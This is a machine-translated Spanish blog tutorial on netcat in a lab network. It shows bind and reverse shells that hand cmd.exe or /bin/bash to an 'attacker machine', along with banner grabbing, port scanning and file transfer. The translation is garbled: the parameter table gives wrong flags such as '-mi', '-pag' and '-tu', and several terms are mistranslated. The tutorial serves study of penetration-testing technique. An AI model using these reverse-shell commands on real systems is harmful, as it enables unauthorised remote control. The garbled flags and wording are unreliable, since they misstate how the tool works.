Tecnología de proxy de túnel de intranet (5) Shell de rebote de Netcat

Concha de rebote Netcat

Netcat, NC para abreviar, es una herramienta de red simple y confiable, conocida como la navaja suiza de la industria de redes. A través de NC, puede realizar operaciones como escaneo de puertos, shell inverso, monitoreo de puertos y transferencia de archivos. Los parámetros comunes son los siguientes:

parámetro efecto
-C Especifica el comando de shell para ejecutar después de conectarse
-mi Especifica el nombre del archivo que se ejecutará después de la conexión.
-k Configure el Socket para mantenerse vivo (puede usar este parámetro si no desea desconectar el oyente después de salir del Shell)
-l modo monitor
-pag Establecer el puerto de comunicación utilizado por el host local
-tu Utilice el protocolo de transporte UDP, el valor predeterminado es TCP
-v Muestre el proceso de ejecución de la instrucción, use -vv para ser más detallado

1. Carcasa de rebote positivo

topología experimental

inserte la descripción de la imagen aquí

Nombre de la máquina IP
máquina de ataque 192.168.41.20
servidor 192.168.41.130

Introducción al experimento

La máquina atacante 192.168.41.20 y el servidor 192.168.41.130 pueden acceder entre sí, en este momento puede usar el shell de reenvío

Reproducción experimental

1) Ejecutar en el servidor:

#windows机器
nc64.exe -lvvp 1111 -e C:\Windows\System32\cmd.exe 
#linux机器
nc -lvvp 1111 -e /bin/bash 

inserte la descripción de la imagen aquí

2) Ejecutar en el avión de ataque

nc64.exe 192.168.41.130 1111

inserte la descripción de la imagen aquí

3) Obtener la capa positiva

inserte la descripción de la imagen aquí

2. Carcasa de rebote inverso

topología experimental

inserte la descripción de la imagen aquí

Nombre de la máquina IP
máquina de ataque 192.168.41.20
servidor 192.168.41.130

Introducción al experimento

La máquina del atacante 192.168.41.20 no puede acceder directamente al servidor, pero el servidor 192.168.41.130 puede acceder a la máquina del atacante. En este momento, se puede usar un shell inverso

Reproducción experimental

1) Ejecutar en la máquina atacante

#监听1111端口
nc64.exe -lvvp 1111 

inserte la descripción de la imagen aquí

2) ejecutar en el servidor (rebote a la máquina de ataque)

#windos机器
nc64.exe -e C:\Windows\System32\cmd.exe 192.168.41.20 1111 
#linux机器
nc -e /bin/bash 192.168.41.20 1111

inserte la descripción de la imagen aquí

3) El atacante obtiene el caparazón inverso

inserte la descripción de la imagen aquí

3. Otros usos de Netcat

Captura de pancartas

La máquina de destino está ejecutando el servicio ssh, puede ver la versión del servicio

nc64.exe -nv IP Port

inserte la descripción de la imagen aquí

detección de puertos

Puede verificar la apertura del puerto y puede ver que el puerto 80 de nuestro servidor de destino no está abierto

nc64.exe -v IP Port

inserte la descripción de la imagen aquí

escaneo multipuerto

Puede verificar si varios puertos están abiertos y servicios permitidos

nc -v -z IP Port[1]-Port[65535]

inserte la descripción de la imagen aquí

puerto de escucha

Puerto de escucha, cuando se accede al puerto, se emitirá la información

nc64.exe -l -p Port

inserte la descripción de la imagen aquí

transferencia de archivos

máquina IP
Receptor 192.168.41.132
remitente 192.168.41.20

La carpeta del receptor está vacía.

inserte la descripción de la imagen aquí
El receptor ejecuta el comando.

nc -lp Port > file

inserte la descripción de la imagen aquí
El remitente ejecuta el comando.

nc -vn IP Port < file -w 1 

inserte la descripción de la imagen aquí

El receptor recibe el archivo

inserte la descripción de la imagen aquí

charla fácil

ejecución de aviones de ataque

nc -l -p Port

inserte la descripción de la imagen aquí

ejecución del servidor

nc64.exe -vn IP Port

inserte la descripción de la imagen aquí

El atacante recibe chat

inserte la descripción de la imagen aquí

Supongo que te gusta

Origin blog.csdn.net/qq_64973687/article/details/131364260
Recomendado
Clasificación